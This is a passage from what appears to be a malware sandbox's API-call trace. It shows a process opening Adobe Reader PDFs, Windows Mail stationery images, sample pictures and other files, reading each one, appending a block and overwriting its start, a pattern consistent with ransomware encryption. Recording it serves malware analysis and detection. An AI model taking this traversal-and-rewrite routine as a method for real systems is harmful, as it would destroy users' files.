dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0075.658] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0075.658] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xe5af [0075.659] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0075.659] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.659] ReleaseMutex (hMutex=0x168) returned 1 [0075.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0075.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x1f7344c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dynamic.pdf", lpUsedDefaultChar=0x0) returned 11 [0075.659] ReadFile (in: hFile=0x1d4, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0075.661] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xd5af [0075.661] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.662] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xd5af [0075.662] WriteFile (in: hFile=0x1d4, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0075.663] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0075.663] WriteFile (in: hFile=0x1d4, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0075.663] CloseHandle (hObject=0x1d4) returned 1 [0075.663] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\standardbusiness.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0075.664] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0075.664] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1804a [0075.664] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0075.665] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.665] ReleaseMutex (hMutex=0x168) returned 1 [0075.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0075.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x1f88c44, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardBusiness.pdf", lpUsedDefaultChar=0x0) returned 20 [0075.665] ReadFile (in: hFile=0x1d4, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0075.667] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1704a [0075.667] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.668] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1704a [0075.668] WriteFile (in: hFile=0x1d4, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0075.669] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0075.669] WriteFile (in: hFile=0x1d4, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0075.669] CloseHandle (hObject=0x1d4) returned 1 [0075.669] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\ENUtxt.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\enutxt.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0075.670] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0075.670] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1d9e [0075.670] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0075.670] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.671] ReleaseMutex (hMutex=0x168) returned 1 [0075.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ENUtxt.pdf", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0075.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ENUtxt.pdf", cchWideChar=10, lpMultiByteStr=0x1f7344c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ENUtxt.pdf", lpUsedDefaultChar=0x0) returned 10 [0075.671] ReadFile (in: hFile=0x1d4, lpBuffer=0x2667868, nNumberOfBytesToRead=0x1d9e, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesRead=0x359f2bc*=0x1d9e, lpOverlapped=0x0) returned 1 [0075.673] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0075.673] WriteFile (in: hFile=0x1d4, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x2326, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x359f2d0*=0x2326, lpOverlapped=0x0) returned 1 [0075.674] CloseHandle (hObject=0x1d4) returned 1 [0075.675] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0076.056] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0076.056] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x780 [0076.056] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0076.056] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.056] ReleaseMutex (hMutex=0x168) returned 1 [0076.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Roses.jpg", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0076.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Roses.jpg", cchWideChar=9, lpMultiByteStr=0x1f733cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Roses.jpg", lpUsedDefaultChar=0x0) returned 9 [0076.056] ReadFile (in: hFile=0x1e8, lpBuffer=0x2663858, nNumberOfBytesToRead=0x780, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesRead=0x359f2bc*=0x780, lpOverlapped=0x0) returned 1 [0076.060] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0076.061] WriteFile (in: hFile=0x1e8, lpBuffer=0x2872fb8*, nNumberOfBytesToWrite=0xd08, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2872fb8*, lpNumberOfBytesWritten=0x359f2d0*=0xd08, lpOverlapped=0x0) returned 1 [0076.061] CloseHandle (hObject=0x1e8) returned 1 [0076.061] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0076.062] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0076.062] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x432 [0076.062] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0076.062] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.062] ReleaseMutex (hMutex=0x168) returned 1 [0076.063] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bears.jpg", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0076.063] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bears.jpg", cchWideChar=9, lpMultiByteStr=0x1f7344c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Bears.jpg", lpUsedDefaultChar=0x0) returned 9 [0076.063] ReadFile (in: hFile=0x1e8, lpBuffer=0x269c668, nNumberOfBytesToRead=0x432, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269c668*, lpNumberOfBytesRead=0x359f2bc*=0x432, lpOverlapped=0x0) returned 1 [0076.065] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0076.065] WriteFile (in: hFile=0x1e8, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9ba, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x359f2d0*=0x9ba, lpOverlapped=0x0) returned 1 [0076.066] CloseHandle (hObject=0x1e8) returned 1 [0076.066] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\softblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0076.066] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0076.066] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x2949 [0076.066] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0076.067] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.067] ReleaseMutex (hMutex=0x168) returned 1 [0076.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SoftBlue.jpg", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SoftBlue.jpg", cchWideChar=12, lpMultiByteStr=0x1f732cc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SoftBlue.jpg", lpUsedDefaultChar=0x0) returned 12 [0076.067] ReadFile (in: hFile=0x1e8, lpBuffer=0x2870f88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.072] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1949 [0076.072] ReadFile (in: hFile=0x1e8, lpBuffer=0x2870f88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.074] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1949 [0076.074] WriteFile (in: hFile=0x1e8, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.075] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0076.075] WriteFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0076.075] CloseHandle (hObject=0x1e8) returned 1 [0076.075] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0076.076] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0076.076] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xbde6b [0076.076] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0076.076] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.076] ReleaseMutex (hMutex=0x168) returned 1 [0076.076] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Penguins.jpg", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.077] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Penguins.jpg", cchWideChar=12, lpMultiByteStr=0x1f7346c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Penguins.jpg", lpUsedDefaultChar=0x0) returned 12 [0076.077] ReadFile (in: hFile=0x1e8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0076.082] ReadFile (in: hFile=0x1e8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.086] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xbce6b [0076.086] ReadFile (in: hFile=0x1e8, lpBuffer=0x2695be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.089] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xbce6b [0076.089] WriteFile (in: hFile=0x1e8, lpBuffer=0x2872fb8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2872fb8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.090] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0076.090] WriteFile (in: hFile=0x1e8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0076.091] WriteFile (in: hFile=0x1e8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0076.091] CloseHandle (hObject=0x1e8) returned 1 [0076.092] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0076.095] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0076.095] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x7d92 [0076.096] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0076.096] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.096] ReleaseMutex (hMutex=0x168) returned 1 [0076.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sql70.xsl", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0076.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sql70.xsl", cchWideChar=9, lpMultiByteStr=0x1f733cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sql70.xsl", lpUsedDefaultChar=0x0) returned 9 [0076.096] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.101] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x6d92 [0076.101] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.102] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x6d92 [0076.103] WriteFile (in: hFile=0x1ec, lpBuffer=0x2669998*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2669998*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.104] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0076.104] WriteFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0076.104] CloseHandle (hObject=0x1ec) returned 1 [0076.104] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Synchronization Services\\aldelo.exe" (normalized: "c:\\program files\\microsoft synchronization services\\aldelo.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0076.105] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Synchronization Services\\aldelo.exe", nBufferLength=0x104, lpBuffer=0x359f694, lpFilePart=0x359f690 | out: lpBuffer="C:\\Program Files\\Microsoft Synchronization Services\\aldelo.exe", lpFilePart=0x359f690*="aldelo.exe") returned 0x3e [0076.105] GetLastError () returned 0x20 [0076.105] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x359f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="氀i͙폈H͙퐔H͙L͙ꪘǷ\x01") returned 0x51 [0076.105] LocalFree (hMem=0x696c00) returned 0x0 [0076.106] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x359d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0076.106] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x359f894) [0076.106] RtlUnwind (TargetFrame=0x359f8fc, TargetIp=0x406ffc, ExceptionRecord=0x359f378, ReturnValue=0x0) [0076.107] RtlUnwind (TargetFrame=0x359f920, TargetIp=0x407184, ExceptionRecord=0x359f378, ReturnValue=0x0) [0076.107] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Synchronization Services\\aldelo.exe" (normalized: "c:\\program files\\microsoft synchronization services\\aldelo.exe")) returned 0x20 [0076.107] CreateFileW (lpFileName="C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui" (normalized: "c:\\program files\\windows journal\\en-us\\jntfiltr.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 